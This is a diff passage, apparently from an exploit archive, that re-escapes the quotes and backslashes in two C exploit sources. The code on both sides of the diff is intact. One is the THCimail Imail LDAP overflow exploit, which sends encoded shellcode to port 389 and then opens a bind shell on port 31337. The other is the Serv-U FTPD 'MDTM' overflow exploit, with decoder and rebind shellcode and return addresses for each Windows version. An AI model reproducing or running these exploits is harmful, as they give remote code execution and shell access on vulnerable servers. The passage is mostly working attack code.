+char ldapshit[] = \"\\x30\\x82\\x0a\\x3d\\x02\\x01\\x01\\x60\\x82\\x01\\x36\\x02\\xff\\xff\\xff\\xff\\x20\";
 
 char shellcode[] =
-"\x8b\x7c\x24\xfc\x83\xc7\x21\x33\xc9\xb2\x8f\x66\x81\xc1\x02"
-"\x02\x8a\x1f\x32\xda\x88\x1f\x47\xe2\xf7\x64\xac\xf5\xe6\x8d"
-"\x8a\xe3\xd6\x77\x92\x13\x51\x03\x5e\xc3\xff\x5b\x8c\x7f\xa8"
-"\xaf\xaf\xbf\x87\xd8\xdc\xbd\xd0\xbc\xbd\xa1\xcb\xc3\xc3\x8e"
-"\x64\x8a\x67\x76\x70\x70\x70\xd2\x0c\x62\xa5\xe5\xbf\xd6\xeb"
-"\x04\x8e\x04\xcf\x83\x04\xff\x93\x22\x04\xf7\x87\x02\xd0\xb3"
-"\x04\x94\x8e\x74\x04\xd4\xf7\x8e\x74\x04\xc4\x93\x8e\x76\x04"
-"\xdc\xab\x8e\x75\xdc\xde\xdd\x04\xd4\xaf\x8e\x74\xbe\x46\xce"
-"\xbe\x4f\x16\x04\xbb\x04\x8e\x71\x23\xbe\x4d\x5e\x6d\x0b\x4f"
-"\xfa\x78\x80\x39\xca\x8a\x02\xcb\xca\x8b\xe9\xb6\x9f\xfa\x6e"
-"\xe9\xbe\x9f\xd5\xd7\xd1\xd9\xdf\xdd\xa4\xc1\x9f\xce\x80\x38"
-"\x83\xc5\x04\x8b\x07\x8e\x77\x80\x39\xc2\x8a\x06\xcb\x02\x57"
-"\x71\xc2\x8a\xfa\x31\x71\xc2\x8b\xfb\xae\x71\xc2\xad\x02\xd2"
-"\x97\xdc\x70\x5f\x06\x48\xe5\x8b\xd7\x07\xca\x8a\x0f\xca\xf8"
-"\x85\x02\xd2\xfb\x0f\xe4\xa9\x9b\x66\xf7\x70\x70\x70\x06\x41"
-"\xbe\x54\xdc\xdc\xdc\xdc\xd9\xc9\xd9\x70\x5f\x18\xda\xd7\xe9"
-"\x06\xbf\xe5\x9f\xda\xd8\x70\xda\x5b\xc1\xd9\xd8\x70\xda\x43"
-"\xdc\xda\xd8\x70\xda\x5f\x18\x02\xca\x07\xdf\x70\xda\x6b\xda"
-"\xda\x70\xda\x67\x02\xcb\x8a\x83\x1b\xdc\xe7\xa1\xea\xf7\xea"
-"\xe7\xd3\xec\xe2\xeb\x1b\xbe\x5d\x02\xca\x43\x1b\xd8\xd8\xd8"
-"\xdc\xdc\x71\x49\x8e\x7d\xdd\x1b\x02\xca\xf7\xdf\x02\xca\x07"
-"\xdf\x3e\x87\xdc\xdc\xe5\x9f\x71\x41\xdd\xdc\xdc\xdc\xda\x70"
-"\xda\x63\xe5\x70\x70\xda\x6f";
+\"\\x8b\\x7c\\x24\\xfc\\x83\\xc7\\x21\\x33\\xc9\\xb2\\x8f\\x66\\x81\\xc1\\x02\"
+\"\\x02\\x8a\\x1f\\x32\\xda\\x88\\x1f\\x47\\xe2\\xf7\\x64\\xac\\xf5\\xe6\\x8d\"
+\"\\x8a\\xe3\\xd6\\x77\\x92\\x13\\x51\\x03\\x5e\\xc3\\xff\\x5b\\x8c\\x7f\\xa8\"
+\"\\xaf\\xaf\\xbf\\x87\\xd8\\xdc\\xbd\\xd0\\xbc\\xbd\\xa1\\xcb\\xc3\\xc3\\x8e\"
+\"\\x64\\x8a\\x67\\x76\\x70\\x70\\x70\\xd2\\x0c\\x62\\xa5\\xe5\\xbf\\xd6\\xeb\"
+\"\\x04\\x8e\\x04\\xcf\\x83\\x04\\xff\\x93\\x22\\x04\\xf7\\x87\\x02\\xd0\\xb3\"
+\"\\x04\\x94\\x8e\\x74\\x04\\xd4\\xf7\\x8e\\x74\\x04\\xc4\\x93\\x8e\\x76\\x04\"
+\"\\xdc\\xab\\x8e\\x75\\xdc\\xde\\xdd\\x04\\xd4\\xaf\\x8e\\x74\\xbe\\x46\\xce\"
+\"\\xbe\\x4f\\x16\\x04\\xbb\\x04\\x8e\\x71\\x23\\xbe\\x4d\\x5e\\x6d\\x0b\\x4f\"
+\"\\xfa\\x78\\x80\\x39\\xca\\x8a\\x02\\xcb\\xca\\x8b\\xe9\\xb6\\x9f\\xfa\\x6e\"
+\"\\xe9\\xbe\\x9f\\xd5\\xd7\\xd1\\xd9\\xdf\\xdd\\xa4\\xc1\\x9f\\xce\\x80\\x38\"
+\"\\x83\\xc5\\x04\\x8b\\x07\\x8e\\x77\\x80\\x39\\xc2\\x8a\\x06\\xcb\\x02\\x57\"
+\"\\x71\\xc2\\x8a\\xfa\\x31\\x71\\xc2\\x8b\\xfb\\xae\\x71\\xc2\\xad\\x02\\xd2\"
+\"\\x97\\xdc\\x70\\x5f\\x06\\x48\\xe5\\x8b\\xd7\\x07\\xca\\x8a\\x0f\\xca\\xf8\"
+\"\\x85\\x02\\xd2\\xfb\\x0f\\xe4\\xa9\\x9b\\x66\\xf7\\x70\\x70\\x70\\x06\\x41\"
+\"\\xbe\\x54\\xdc\\xdc\\xdc\\xdc\\xd9\\xc9\\xd9\\x70\\x5f\\x18\\xda\\xd7\\xe9\"
+\"\\x06\\xbf\\xe5\\x9f\\xda\\xd8\\x70\\xda\\x5b\\xc1\\xd9\\xd8\\x70\\xda\\x43\"
+\"\\xdc\\xda\\xd8\\x70\\xda\\x5f\\x18\\x02\\xca\\x07\\xdf\\x70\\xda\\x6b\\xda\"
+\"\\xda\\x70\\xda\\x67\\x02\\xcb\\x8a\\x83\\x1b\\xdc\\xe7\\xa1\\xea\\xf7\\xea\"
+\"\\xe7\\xd3\\xec\\xe2\\xeb\\x1b\\xbe\\x5d\\x02\\xca\\x43\\x1b\\xd8\\xd8\\xd8\"
+\"\\xdc\\xdc\\x71\\x49\\x8e\\x7d\\xdd\\x1b\\x02\\xca\\xf7\\xdf\\x02\\xca\\x07\"
+\"\\xdf\\x3e\\x87\\xdc\\xdc\\xe5\\x9f\\x71\\x41\\xdd\\xdc\\xdc\\xdc\\xda\\x70\"
+\"\\xda\\x63\\xe5\\x70\\x70\\xda\\x6f\";
 
 
 void usage();
@@ -67,9 +67,9 @@ struct sockaddr_in mytcp;
 struct hostent * hp;
 WSADATA wsaData;
 
-printf("\nTHCimail v0.1 - Imail LDAP exploit\n");
-printf("tested on Imail 6-8\n");
-printf("by Johnny Cyberpunk (jcyberpunk@thc.org)\n");
+printf(\"\\nTHCimail v0.1 - Imail LDAP exploit\\n\");
+printf(\"tested on Imail 6-8\\n\");
+printf(\"by Johnny Cyberpunk (jcyberpunk@thc.org)\\n\");
 
 if(argc<4 || argc>4)
 usage();
@@ -84,23 +84,23 @@ case 1:
 IMAILVER = IMAIL_8;
 break;
 default:
-printf("\nYou entered an illegal version !\n\n");
+printf(\"\\nYou entered an illegal version !\\n\\n\");
 usage();
 exit(-1);
 }
 
 crapbuf1 = malloc(IMAILVER);
-memset(crapbuf1,'X',IMAILVER);
+memset(crapbuf1,\'X\',IMAILVER);
 
-printf("imailver = %d\n",IMAILVER);
+printf(\"imailver = %d\\n\",IMAILVER);
 
 crapbuf2 = malloc(2220);
-memset(crapbuf2,'X',2220);
+memset(crapbuf2,\'X\',2220);
 
 finalbuffer = malloc(2650);
 memset(finalbuffer,0,2650);
 
-printf("\n[*] building buffer\n");
+printf(\"\\n[*] building buffer\\n\");
 
 strcat(finalbuffer,ldapshit);
 
@@ -121,7 +121,7 @@ case 2:
 strcat(finalbuffer,WINXPSP1G);
 break;
 default:
-printf("\nYou entered an illegal OS !\n\n");
+printf(\"\\nYou entered an illegal OS !\\n\\n\");
 usage();
 exit(-1);
 }
@@ -131,7 +131,7 @@ strcat(finalbuffer,crapbuf2);
 
 if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0)
 {
-printf("WSAStartup failed !\n");
+printf(\"WSAStartup failed !\\n\");
 exit(-1);
 }
 
@@ -142,14 +142,14 @@ addr = inet_addr(argv[1]);
 }
 if ((!hp) && (addr == INADDR_NONE) )
 {
-printf("Unable to resolve %s\n",argv[1]);
+printf(\"Unable to resolve %s\\n\",argv[1]);
 exit(-1);
 }
 
 sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
 if (!sock)
 { 
-printf("socket() error...\n");
+printf(\"socket() error...\\n\");
 exit(-1);
 }
 
@@ -165,27 +165,27 @@ mytcp.sin_family = AF_INET;
 
 mytcp.sin_port=htons(389);
 
-printf("[*] connecting the target\n");
+printf(\"[*] connecting the target\\n\");
 
 rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct sockaddr_in));
 if(rc==0)
 {
 send(sock,finalbuffer,2650,0);
-printf("[*] Exploit send successfully ! Sleeping a while ....\n");
+printf(\"[*] Exploit send successfully ! Sleeping a while ....\\n\");
 Sleep(1000);
 }
 else
-printf("\nCan't connect to ldap port!\n");
+printf(\"\\nCan\'t connect to ldap port!\\n\");
 
 if(rc==0)
 {
-printf("[*] Trying to get a shell\n\n");
+printf(\"[*] Trying to get a shell\\n\\n\");
 sock2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
 mytcp.sin_port = htons(31337);
 rc = connect(sock2, (struct sockaddr *)&mytcp, sizeof(mytcp));
 if(rc!=0)
 {
-printf("can't connect to port 31337 ;( maybe firewalled ...\n");
+printf(\"can\'t connect to port 31337 ;( maybe firewalled ...\\n\");
 exit(-1);
 }
 shell(sock2);
@@ -204,15 +204,15 @@ exit(0);
 void usage()
 {
 unsigned int a;
-printf("\nUsage:   \n");
-printf("Sample: THCimail 194.44.55.56 0 1\n\n");
-printf("OS:\n");
-printf("0 - Windows 2000 Server english all service packs\n");
-printf("1 - Windows 2000 Professional german\n");
-printf("2 - Windows XP SP1 german\n\n");
-printf("Imail Version:\n");
-printf("0 - Imail 6+7\n");
-printf("1 - Imail 8\n");
+printf(\"\\nUsage:   \\n\");
+printf(\"Sample: THCimail 194.44.55.56 0 1\\n\\n\");
+printf(\"OS:\\n\");
+printf(\"0 - Windows 2000 Server english all service packs\\n\");
+printf(\"1 - Windows 2000 Professional german\\n\");
+printf(\"2 - Windows XP SP1 german\\n\\n\");
+printf(\"Imail Version:\\n\");
+printf(\"0 - Imail 6+7\\n\");
+printf(\"1 - Imail 8\\n\");
 exit(0);
 }
 
@@ -237,13 +237,13 @@ if(l == 1)
 l = recv (sock, buf, sizeof (buf), 0);
 if (l <= 0)
 {
-printf ("bye bye...\n");
+printf (\"bye bye...\\n\");
 return;
 }
 l = write (1, buf, l);
 if (l <= 0)
 {
-printf ("bye bye...\n");
+printf (\"bye bye...\\n\");
 return;
 }
 }
@@ -252,13 +252,13 @@ else
 l = read (0, buf, sizeof (buf));
 if (l <= 0)
 {
-printf("bye bye...\n");
+printf(\"bye bye...\\n\");
 return;
 }
 l = send(sock, buf, l, 0);
 if (l <= 0)
 {
-printf("bye bye...\n");
+printf(\"bye bye...\\n\");
 return;
 }
 }
diff --git a/platforms/windows/remote/158.c b/platforms/windows/remote/158.c
index d8554a34f..fe6d9f6ae 100755
--- a/platforms/windows/remote/158.c
+++ b/platforms/windows/remote/158.c
@@ -1,4 +1,4 @@
-/* ex_servu.c - Serv-U FTPD 3.x/4.x/5.x "MDTM" Command remote overflow exploit
+/* ex_servu.c - Serv-U FTPD 3.x/4.x/5.x \"MDTM\" Command remote overflow exploit
 *
 * Copyright (c) SST 2004 All rights reserved.
 *
@@ -42,12 +42,12 @@
 *  Microsoft Windows XP [Version 5.1.2600]
 *  (C) Copyright 1985-2001 Microsoft Corp.
 *
-*  [Sam Chen@SAM C:\]#
+*  [Sam Chen@SAM C:\\]#
 *
 *
 * some thanks/greets to:
 * bkbll (he find this bug :D), airsupply, kkqq, icbm
-* and everyone else who's KNOW SST;P
+* and everyone else who\'s KNOW SST;P
 * http://0x557.org
 */
 
@@ -67,7 +67,7 @@
 #include 
 #include 
 
-#define VER "v5.0"
+#define VER \"v5.0\"
 
 #define clearbit(buff)          bzero(buff, sizeof (buff));
 #define padding(buff, a)        memset(buff, a, sizeof (buff));
@@ -86,28 +86,28 @@ struct archs {
 
 
        {
-               "Serv-U v3.x/4.x/5.x  with Windows 2K CN",   //winmm.dll
+               \"Serv-U v3.x/4.x/5.x  with Windows 2K CN\",   //winmm.dll
                0x77535985
 
        },
         {
-               "Serv-U v3.x/4.x/5.x  with Windows 2K BIG5 version",   //winmm.dll
+               \"Serv-U v3.x/4.x/5.x  with Windows 2K BIG5 version\",   //winmm.dll
                 0x77531790
 
        },
        {
-               "Serv-U v3.x/4.x/5.x  with Windows 2K EN",
+               \"Serv-U v3.x/4.x/5.x  with Windows 2K EN\",
                0x77575985
 
        },
 
        {
-               "Serv-U v3.x/4.x/5.x  with Windows XP CN SP1",
+               \"Serv-U v3.x/4.x/5.x  with Windows XP CN SP1\",
                0x76b12f69
 
        },
        {
-               "Serv-U v3.x/4.x/5.x  with Windows XP EN SP1",
+               \"Serv-U v3.x/4.x/5.x  with Windows XP EN SP1\",
                0x76b42a3a
 
 }
@@ -117,62 +117,62 @@ struct archs {
 char decoder [] =
 /* 36 bytes cool decoder by airsupply :) */
 
-"\x90\x90\x90\x5E\x5F\x5B\xBE\x52\x52\x49\x41\x46\xBF\x52\x52\x31"
-"\x41\x47\x43\x39\x3B\x75\xFB\x4B\x80\x33\x99\x39\x73\xFC\x75\xF7"
-"\xFF\xD3\x90\x90";
+\"\\x90\\x90\\x90\\x5E\\x5F\\x5B\\xBE\\x52\\x52\\x49\\x41\\x46\\xBF\\x52\\x52\\x31\"
+\"\\x41\\x47\\x43\\x39\\x3B\\x75\\xFB\\x4B\\x80\\x33\\x99\\x39\\x73\\xFC\\x75\\xF7\"
+\"\\xFF\\xD3\\x90\\x90\";
 
 /* fork + rebind shellcode  by airsupply (one way shellcode) */
 char    shellcode [] =
 
-"\x53\x52\x49\x41"
+\"\\x53\\x52\\x49\\x41\"
 
 /*port offset 120 + 4*/
-"\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12\xD9\x85\x12\x99\x12\xD9"
-"\x91\x18\x75\x19\x98\x99\x99\x12\x65\x12\x76\x32\x70\x8B\x9B\x99"
-"\x99\xC7\xAA\x50\x28\x90\x66\xEE\x65\x71\xB9\x98\x99\x99\xF1\xF5"
-"\xF5\x99\x99\xF1\xAA\xAB\xB7\xFD\xF1\xEE\xEA\xAB\xC6\xCD\x66\xCC"
-"\x9D\x32\xAA\x50\x28\x9C\x66\xEE\x65\x71\x99\x98\x99\x99\x12\x6C"
-"\x71\x94\x98\x99\x99\xAA\x66\x18\x75\x09\x98\x99\x99\xCD\xF1\x98"
-"\x98\x99\x99\x66\xCF\xB5\xC9\xC9\xC9\xC9\xD9\xC9\xD9\xC9\x66\xCF"
-"\xA9\x12\x41\xCE\xCE\xF1\x9B\x99\x8C\x5B\x12\x55\xCA\xC8\xF3\x8F"
-"\xC8\xCA\x66\xCF\xAD\xC0\xC2\x1C\x59\xEC\x68\xCE\xCA\x66\xCF\xA1"
-"\xCE\xC8\xCA\x66\xCF\xA5\x12\x49\x10\x1F\xD9\x98\x99\x99\xF1\xFC"
-"\xE1\xFC\x99\xF1\xFA\xF4\xFD\xB7\x10\x3F\xA9\x98\x99\x99\x1A\x75"
-"\xCD\x14\xA5\xBD\xAA\x59\xAA\x50\x1A\x58\x8C\x32\x7B\x64\x5F\xDD"
-"\xBD\x89\xDD\x67\xDD\xBD\xA5\x67\xDD\xBD\xA4\x10\xCD\xBD\xD1\x10"
-"\xCD\xBD\xD5\x10\xCD\xBD\xC9\x14\xDD\xBD\x89\x14\x27\xDD\x98\x99"
-"\x99\xCE\xC9\xC8\xC8\xC8\xD8\xC8\xD0\xC8\xC8\x66\x2F\xA9\x98\x99"
-"\x99\xC8\x66\xCF\x91\xAA\x59\xD1\xC9\x66\xCF\x95\xCA\xCC\xCF\xCE"
-"\x12\xF5\xBD\x81\x12\xDC\xA5\x12\xCD\x9C\xE1\x9A\x4C\x12\xD3\x81"
-"\x12\xC3\xB9\x9A\x44\x7A\xA9\xD0\x12\xAD\x12\x9A\x6C\xAA\x66\x65"
-"\xAA\x59\x35\xA3\x79\xED\x9E\x58\x56\x9E\x9A\x61\x72\x6B\xA2\xE5"
-"\xBD\x8D\xEC\x78\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85"
-"\x9A\x44\x12\x9D\x12\x9A\x5C\xC6\xC7\xC4\xC2\x5B\x9D\x99\xC8\x66"
-"\xED\xBD\x91\x34\xC9\x71\x3B\x66\x66\x66\x1A\x5D\x9D\xC0\x32\x7B"
-"\x74\x5A\xF1\xFC\xE1\xFC\x99\xF1\xFA\xF4\xFD\xB7\x10\x3F\xA9\x98"
-"\x99\x99\x1A\x75\xCD\x14\xA5\xBD\xAA\x59\xAA\x50\x1A\x58\x8C\x32"
-"\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD\xBD\xA5\x67\xDD\xBD\xA4\x10"
-"\xDD\xBD\xD1\x10\xDD\xBD\xD5\x10\xDD\xBD\xC9\x14\xDD\xBD\x89\x14"
-"\x27\xDD\x98\x99\x99\xCE\xC9\xC8\xC8\xF3\x9D\xC8\xC8\xC8\x66\x2F"
-"\xA9\x98\x99\x99\xC8\x66\xCF\x91\x18\x75\x99\x9D\x99\x99\xF1\x9E"
-"\x99\x98\x99\xCD\x66\x2F\xD1\x98\x99\x99\x66\xCF\x89\xF3\xD9\xF1"
-"\x99\x89\x99\x99\xF1\x99\xC9\x99\x99\xF3\x99\x66\x2F\xDD\x98\x99"
-"\x99\x66\xCF\x8D\x10\x1D\xBD\x21\x99\x99\x99\x10\x1D\xBD\x2D\x99"
-"\x99\x99\x12\x15\xBD\xF9\x9D\x99\x99\x5E\xD8\x62\x09\x09\x09\x09"
-"\x5F\xD8\x66\x09\x1A\x70\xCC\xF3\x99\xF1\x99\x89\x99\x99\xC8\xC9"
-"\x66\x2F\xDD\x98\x99\x99\x66\xCF\x81\xCD\x66\x2F\xD1\x98\x99\x99"
-"\x66\xCF\x85\x66\x2F\xD1\x98\x99\x99\x66\xCF\xB9\xAA\x59\xD1\xC9"
-"\x66\xCF\x95\x71\x70\x64\x66\x66\xAB\xED\x08\x95\x50\x25\x3F\xF2"
-"\x16\x6B\x81\xF8\x51\xCE\xD6\x88\x68\xE2\x05\x76\xC1\x96\xD8\x0E"
-"\x51\xCE\xD6\x8E\x4F\x15\x07\x6A\xFA\x10\x48\xD6\xA4\xF3\x2D\x19"
-"\xB4\xAB\xE1\x47\xFD\x89\x3E\x44\x95\x06\x4A\xD2\x28\x87\x0E\x98"
-"\x06\x06\x06\x06"
-"\x53\x52\x31\x41";
+\"\\xFD\\x38\\xA9\\x99\\x99\\x99\\x12\\xD9\\x95\\x12\\xD9\\x85\\x12\\x99\\x12\\xD9\"
+\"\\x91\\x18\\x75\\x19\\x98\\x99\\x99\\x12\\x65\\x12\\x76\\x32\\x70\\x8B\\x9B\\x99\"
+\"\\x99\\xC7\\xAA\\x50\\x28\\x90\\x66\\xEE\\x65\\x71\\xB9\\x98\\x99\\x99\\xF1\\xF5\"
+\"\\xF5\\x99\\x99\\xF1\\xAA\\xAB\\xB7\\xFD\\xF1\\xEE\\xEA\\xAB\\xC6\\xCD\\x66\\xCC\"
+\"\\x9D\\x32\\xAA\\x50\\x28\\x9C\\x66\\xEE\\x65\\x71\\x99\\x98\\x99\\x99\\x12\\x6C\"
+\"\\x71\\x94\\x98\\x99\\x99\\xAA\\x66\\x18\\x75\\x09\\x98\\x99\\x99\\xCD\\xF1\\x98\"
+\"\\x98\\x99\\x99\\x66\\xCF\\xB5\\xC9\\xC9\\xC9\\xC9\\xD9\\xC9\\xD9\\xC9\\x66\\xCF\"
+\"\\xA9\\x12\\x41\\xCE\\xCE\\xF1\\x9B\\x99\\x8C\\x5B\\x12\\x55\\xCA\\xC8\\xF3\\x8F\"
+\"\\xC8\\xCA\\x66\\xCF\\xAD\\xC0\\xC2\\x1C\\x59\\xEC\\x68\\xCE\\xCA\\x66\\xCF\\xA1\"
+\"\\xCE\\xC8\\xCA\\x66\\xCF\\xA5\\x12\\x49\\x10\\x1F\\xD9\\x98\\x99\\x99\\xF1\\xFC\"
+\"\\xE1\\xFC\\x99\\xF1\\xFA\\xF4\\xFD\\xB7\\x10\\x3F\\xA9\\x98\\x99\\x99\\x1A\\x75\"
+\"\\xCD\\x14\\xA5\\xBD\\xAA\\x59\\xAA\\x50\\x1A\\x58\\x8C\\x32\\x7B\\x64\\x5F\\xDD\"
+\"\\xBD\\x89\\xDD\\x67\\xDD\\xBD\\xA5\\x67\\xDD\\xBD\\xA4\\x10\\xCD\\xBD\\xD1\\x10\"
+\"\\xCD\\xBD\\xD5\\x10\\xCD\\xBD\\xC9\\x14\\xDD\\xBD\\x89\\x14\\x27\\xDD\\x98\\x99\"
+\"\\x99\\xCE\\xC9\\xC8\\xC8\\xC8\\xD8\\xC8\\xD0\\xC8\\xC8\\x66\\x2F\\xA9\\x98\\x99\"
+\"\\x99\\xC8\\x66\\xCF\\x91\\xAA\\x59\\xD1\\xC9\\x66\\xCF\\x95\\xCA\\xCC\\xCF\\xCE\"
+\"\\x12\\xF5\\xBD\\x81\\x12\\xDC\\xA5\\x12\\xCD\\x9C\\xE1\\x9A\\x4C\\x12\\xD3\\x81\"
+\"\\x12\\xC3\\xB9\\x9A\\x44\\x7A\\xA9\\xD0\\x12\\xAD\\x12\\x9A\\x6C\\xAA\\x66\\x65\"
+\"\\xAA\\x59\\x35\\xA3\\x79\\xED\\x9E\\x58\\x56\\x9E\\x9A\\x61\\x72\\x6B\\xA2\\xE5\"
+\"\\xBD\\x8D\\xEC\\x78\\x12\\xC3\\xBD\\x9A\\x44\\xFF\\x12\\x95\\xD2\\x12\\xC3\\x85\"
+\"\\x9A\\x44\\x12\\x9D\\x12\\x9A\\x5C\\xC6\\xC7\\xC4\\xC2\\x5B\\x9D\\x99\\xC8\\x66\"
+\"\\xED\\xBD\\x91\\x34\\xC9\\x71\\x3B\\x66\\x66\\x66\\x1A\\x5D\\x9D\\xC0\\x32\\x7B\"
+\"\\x74\\x5A\\xF1\\xFC\\xE1\\xFC\\x99\\xF1\\xFA\\xF4\\xFD\\xB7\\x10\\x3F\\xA9\\x98\"
+\"\\x99\\x99\\x1A\\x75\\xCD\\x14\\xA5\\xBD\\xAA\\x59\\xAA\\x50\\x1A\\x58\\x8C\\x32\"
+\"\\x7B\\x64\\x5F\\xDD\\xBD\\x89\\xDD\\x67\\xDD\\xBD\\xA5\\x67\\xDD\\xBD\\xA4\\x10\"
+\"\\xDD\\xBD\\xD1\\x10\\xDD\\xBD\\xD5\\x10\\xDD\\xBD\\xC9\\x14\\xDD\\xBD\\x89\\x14\"
+\"\\x27\\xDD\\x98\\x99\\x99\\xCE\\xC9\\xC8\\xC8\\xF3\\x9D\\xC8\\xC8\\xC8\\x66\\x2F\"
+\"\\xA9\\x98\\x99\\x99\\xC8\\x66\\xCF\\x91\\x18\\x75\\x99\\x9D\\x99\\x99\\xF1\\x9E\"
+\"\\x99\\x98\\x99\\xCD\\x66\\x2F\\xD1\\x98\\x99\\x99\\x66\\xCF\\x89\\xF3\\xD9\\xF1\"
+\"\\x99\\x89\\x99\\x99\\xF1\\x99\\xC9\\x99\\x99\\xF3\\x99\\x66\\x2F\\xDD\\x98\\x99\"
+\"\\x99\\x66\\xCF\\x8D\\x10\\x1D\\xBD\\x21\\x99\\x99\\x99\\x10\\x1D\\xBD\\x2D\\x99\"
+\"\\x99\\x99\\x12\\x15\\xBD\\xF9\\x9D\\x99\\x99\\x5E\\xD8\\x62\\x09\\x09\\x09\\x09\"
+\"\\x5F\\xD8\\x66\\x09\\x1A\\x70\\xCC\\xF3\\x99\\xF1\\x99\\x89\\x99\\x99\\xC8\\xC9\"
+\"\\x66\\x2F\\xDD\\x98\\x99\\x99\\x66\\xCF\\x81\\xCD\\x66\\x2F\\xD1\\x98\\x99\\x99\"
+\"\\x66\\xCF\\x85\\x66\\x2F\\xD1\\x98\\x99\\x99\\x66\\xCF\\xB9\\xAA\\x59\\xD1\\xC9\"
+\"\\x66\\xCF\\x95\\x71\\x70\\x64\\x66\\x66\\xAB\\xED\\x08\\x95\\x50\\x25\\x3F\\xF2\"
+\"\\x16\\x6B\\x81\\xF8\\x51\\xCE\\xD6\\x88\\x68\\xE2\\x05\\x76\\xC1\\x96\\xD8\\x0E\"
+\"\\x51\\xCE\\xD6\\x8E\\x4F\\x15\\x07\\x6A\\xFA\\x10\\x48\\xD6\\xA4\\xF3\\x2D\\x19\"
+\"\\xB4\\xAB\\xE1\\x47\\xFD\\x89\\x3E\\x44\\x95\\x06\\x4A\\xD2\\x28\\x87\\x0E\\x98\"
+\"\\x06\\x06\\x06\\x06\"
+\"\\x53\\x52\\x31\\x41\";
 
 
 /* new:
 * tcp connect with no block socket, host to ip.
-* millisecond timeout, it's will be fast.
+* millisecond timeout, it\'s will be fast.
 *;D
 * 2003/06/23 add by Sam
 */
@@ -190,13 +190,13 @@ int new_tcpConnect (char *host, unsigned int port, unsigned int timeout)
        // reslov hosts
        hp = gethostbyname (host);
        if (NULL == hp) {
-               perror ("tcpConnect:gethostbyname\n");
+               perror (\"tcpConnect:gethostbyname\\n\");
                return -1;
        }
 
        sock = socket (AF_INET, SOCK_STREAM, 0);
        if (-1 == sock) {
-               perror ("tcpConnect:socket\n");
+               perror (\"tcpConnect:socket\\n\");
                return -1;
        }
 
@@ -208,14 +208,14 @@ int new_tcpConnect (char *host, unsigned int port, unsigned int timeout)
         */
        flag = fcntl (sock, F_GETFL);
        if (-1 == flag) {
-               perror ("tcpConnect:fcntl\n");
+               perror (\"tcpConnect:fcntl\\n\");
                close (sock);
                return -1;
        }
 
        flag |= O_NONBLOCK;
        if (fcntl (sock, F_SETFL, flag) < 0) {
-               perror ("tcpConnect:fcntl\n");
+               perror (\"tcpConnect:fcntl\\n\");
                close (sock);
                return -1;
        }
@@ -223,7 +223,7 @@ int new_tcpConnect (char *host, unsigned int port, unsigned int timeout)
        if (connect (sock, (const struct sockaddr *) &addr,
                            sizeof(addr)) < 0 &&
            errno != EINPROGRESS) {
-               perror ("tcpConnect:connect\n");
+               perror (\"tcpConnect:connect\\n\");
                close (sock);
                return -1;
        }
@@ -238,7 +238,7 @@ int new_tcpConnect (char *host, unsigned int port, unsigned int timeout)
        FD_SET (sock, &rset);
 
        if (select (sock+1, &rset, &rset, NULL, &tv) <= 0) {
-//                perror ("tcpConnect:select");
+//                perror (\"tcpConnect:select\");
                close (sock);
                return -1;
        }
@@ -246,7 +246,7 @@ int new_tcpConnect (char *host, unsigned int port, unsigned int timeout)
        pe_len = sizeof (pe);
 
        if (getsockopt (sock, SOL_SOCKET, SO_ERROR, &pe, &pe_len) < 0) {
-               perror ("tcpConnect:getsockopt\n");
+               perror (\"tcpConnect:getsockopt\\n\");
                close (sock);
                return -1;
        }
@@ -258,7 +258,7 @@ int new_tcpConnect (char *host, unsigned int port, unsigned int timeout)
        }
 
        if (fcntl(sock, F_SETFL, flag&~O_NONBLOCK) < 0) {
-               perror ("tcpConnect:fcntl\n");
+               perror (\"tcpConnect:fcntl\\n\");
                close (sock);
                return -1;
        }
@@ -267,7 +267,7 @@ int new_tcpConnect (char *host, unsigned int port, unsigned int timeout)
        pe_len = sizeof (pe);
 
        if (setsockopt (sock, IPPROTO_TCP, TCP_NODELAY, &pe, pe_len) < 0){
-               perror ("tcpConnect:setsockopt\n");
+               perror (\"tcpConnect:setsockopt\\n\");
                close (sock);
                return -1;
        }
@@ -357,7 +357,7 @@ int new_send (int fd, char *buff, size_t len)
        int     ret;
 
        if ((ret = send (fd, buff, len, 0)) <= 0) {
-               perror ("new_write");
+               perror (\"new_write\");
                return -1;
        }
 
@@ -370,7 +370,7 @@ int new_recv (int fd, char *buff, size_t len)
        int     ret;
 
        if ((ret = recv (fd, buff, len, 0)) <= 0) {
-               perror ("new_recv");
+               perror (\"new_recv\");
                return -1;
        }
 
@@ -382,53 +382,53 @@ int ftp_login (char *hostName, short port, char *user, char *pass)
        int     ret, sock;
        char    buff[MAX_LEN];
 
-       fprintf (stderr, "# Connecting...... \n");
+       fprintf (stderr, \"# Connecting...... \\n\");
        if ((sock = new_tcpConnect (hostName, port, 4000)) <= 0) {
-               fprintf (stderr, "[-] failed. \n");
+               fprintf (stderr, \"[-] failed. \\n\");
                return -1;
        }
 
        clearbit (buff);
 
        new_recv (sock, buff, sizeof (buff) - 1);
-       if (!strstr (buff, "220")) {
-               fprintf (stderr, "[-] failed. \n");
+       if (!strstr (buff, \"220\")) {
+               fprintf (stderr, \"[-] failed. \\n\");
                return -1;
        }
-       fprintf (stderr, "[+] Connected. \n");
+       fprintf (stderr, \"[+] Connected. \\n\");
 
        sleep (1);
-       fprintf (stderr, "[*] USER %s .\n", user);
+       fprintf (stderr, \"[*] USER %s .\\n\", user);
        clearbit (buff);
-       snprintf (buff, sizeof (buff), "USER %s\r\n",  user);
+       snprintf (buff, sizeof (buff), \"USER %s\\r\\n\",  user);
        ret = new_send (sock, buff, strlen (buff));
-       fprintf (stderr, "[*] %d bytes send. \n", ret);
+       fprintf (stderr, \"[*] %d bytes send. \\n\", ret);
 
        sleep (1);
 
        clearbit (buff);
        new_recv (sock, buff, sizeof (buff) - 1);
-       if (!strstr (buff, "331")) {
-               fprintf (stderr, "[-] user failed. \n%s\n", buff);
+       if (!strstr (buff, \"331\")) {
+               fprintf (stderr, \"[-] user failed. \\n%s\\n\", buff);
                return -1;
        }
 
-       fprintf (stderr, "[*] PASS %s .\n", pass);
+       fprintf (stderr, \"[*] PASS %s .\\n\", pass);
        clearbit (buff);
-       snprintf (buff, sizeof (buff), "PASS %s\r\n", pass);
